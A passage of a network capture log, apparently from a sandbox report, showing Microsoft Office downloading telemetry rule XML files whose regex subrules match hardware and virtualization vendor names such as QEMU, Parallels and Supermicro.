T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.6	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:08 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:08 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085408Z-1777c6cb754b7tdghC1TEBwwa40000000b000000000071nx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:08 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.6	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:08 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:08 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085408Z-178bfbc474bq2pr7hC1NYCkfgg00000001g00000000007f1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:08 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.6	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:10 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:10 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085410Z-178bfbc474bbcwv4hC1NYCypys000000015g0000000026m8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:10 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.6	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:10 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:10 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 3369a0ea-601e-0002-63f2-3aa786000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085410Z-r1d97b99577ndm4rhC1TEBf0ps0000000aa000000000335x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:10 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.6	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:10 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:10 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:10 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085410Z-178bfbc474bpnd5vhC1NYC4vr400000001ag00000000198t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:10 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.6	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:10 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:10 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085410Z-178bfbc474brk967hC1NYCfu6000000000zg00000000b17s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:11 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.6	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:10 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:11 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 1a8bda6d-001e-002b-2468-3b99f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085411Z-178bfbc474b7cbwqhC1NYC8z4n0000000150000000006c9u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:11 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.6	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:12 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:12 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: e2ff131b-f01e-0085-7676-3b88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085412Z-r1d97b995778dpcthC1TEB4b540000000a00000000009hmk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:12 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.6	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:12 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:12 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: de17e165-601e-0002-3161-3ba786000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085412Z-178bfbc474bscnbchC1NYCe7eg00000001bg0000000091hn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:12 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.6	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:12 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:12 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085412Z-178bfbc474bp8mkvhC1NYCzqnn0000000130000000006prv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:13 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.6	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:12 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:13 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085413Z-1777c6cb754b7tdghC1TEBwwa40000000ay000000000cmrn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:13 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.6	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:54:12 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:54:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:54:13 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 302889d7-401e-0047-2e63-3b8597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085413Z-178bfbc474bv7whqhC1NYC1fg4000000014000000000fnqb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:54:13 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data 